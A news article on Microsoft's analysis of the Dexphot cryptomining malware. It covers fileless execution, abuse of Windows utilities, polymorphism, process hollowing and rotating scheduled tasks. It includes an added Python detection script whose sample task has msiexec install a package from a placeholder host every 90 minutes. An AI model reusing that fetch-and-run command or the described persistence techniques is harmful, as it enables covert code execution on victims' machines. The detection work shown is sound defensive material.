Microsoft says new Dexphot malware infected more than 80,000 computers

November 27, 2019
in Internet Security
This old trojan malware is back with a new trick to help it hide in plain sight

Image: Microsoft

Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.

Named Dexphot, the malware peaked in mid-June this year, when its botnet grew to almost 80,000 infected computers.

Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.

A complex malware strain for a mundane task

But while Dexphot’s end goal was banal, the methods and techniques of its modus operandi stood out for their high level of complexity, something Microsoft also noted.

“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.

“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.

“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”

In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.

Infection process

According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.

In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that is usually side-installed without the user’s knowledge, either as part of software bundles or when users download and install cracked or pirated software.

On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.

Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.

Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.

For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were also using these Windows utilities to do their jobs.

Image: Dexphot modus operandi (Microsoft)

But Dexphot’s operators didn’t stop there. Because antivirus products have in recent years used cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLbin abuse, Dexphot also employed a technique called polymorphism.

This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.

By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.

Multi-layered persistence mechanisms

But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.

Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.

First, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow out their content, and run malicious code from within them.

Disguised as legitimate Windows processes, these two Dexphot components would monitor that all of the malware’s components were up and running, and reinstall the malware if one of them was stopped. Because there were two “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.

Second, as a further failsafe, Dexphot used a series of scheduled tasks to make sure the victim was filelessly reinfected after every reboot, or once every 90 or 110 minutes.

Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.

According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker-controlled server. By modifying this file with updated instructions, the attacker could push changes to every Dexphot-infected host and update the entire botnet within hours of an antivirus vendor deploying any countermeasures.

Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.
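Because the task names rotated, a defender checking scheduled tasks has to key on what a task executes and when, not on what it is called. The following Python snippet is an added illustration, not code from the article or from Microsoft’s report: it parses Windows Task Scheduler XML (the format Task Scheduler exports, for example via `schtasks /Query /XML`) and flags tasks whose action is one of the Windows utilities the article names, whose arguments carry a remote URL, or whose repetition interval matches the 90- or 110-minute cadence described above. Both task definitions are constructed samples, and the placeholder hostname is not a real indicator.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (the same for every exported task definition)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Windows utilities the article names as abused by Dexphot
LOLBINS = {"msiexec.exe", "unzip.exe", "rundll32.exe", "schtasks.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Repetition intervals (minutes) the article attributes to Dexphot's tasks
SUSPECT_INTERVALS = {90, 110}


def task_indicators(task_xml: str) -> list[str]:
    """Return the indicators found in one task definition; [] means nothing matched.
    The task name is deliberately ignored, because Dexphot rotated it."""
    root = ET.fromstring(task_xml)
    found = []
    for action in root.findall(".//t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", "", NS) or "").strip().lower()
        arguments = action.findtext("t:Arguments", "", NS) or ""
        exe = command.replace("\\", "/").rsplit("/", 1)[-1]  # basename of the executable
        if exe in LOLBINS:
            found.append(f"lolbin:{exe}")
        if URL_RE.search(arguments):
            found.append("remote-url-argument")
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        m = re.fullmatch(r"PT(\d+)M", (interval.text or "").strip())  # ISO 8601 duration
        if m and int(m.group(1)) in SUSPECT_INTERVALS:
            found.append(f"repeats-every-{m.group(1)}m")
    return found


# Constructed sample: harmless-looking, but a LOLBin fetching a remote file every 90 minutes
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2019-06-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT90M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\\Windows\\System32\\msiexec.exe</Command>
    <Arguments>/i http://placeholder.invalid/update.msi /q</Arguments></Exec></Actions>
</Task>"""

# Constructed sample: a routine nightly job with no LOLBin, URL, or suspect interval
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2019-06-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Tools\\backup.exe</Command><Arguments>--nightly</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, task_indicators(xml_text))
```

Any single indicator is only a heuristic; the combination of a LOLBin, a remote download and a fixed short interval is what makes a task worth triage.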

As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.

However, in the last two years these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a cryptocurrency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.

Credit: ZDNet
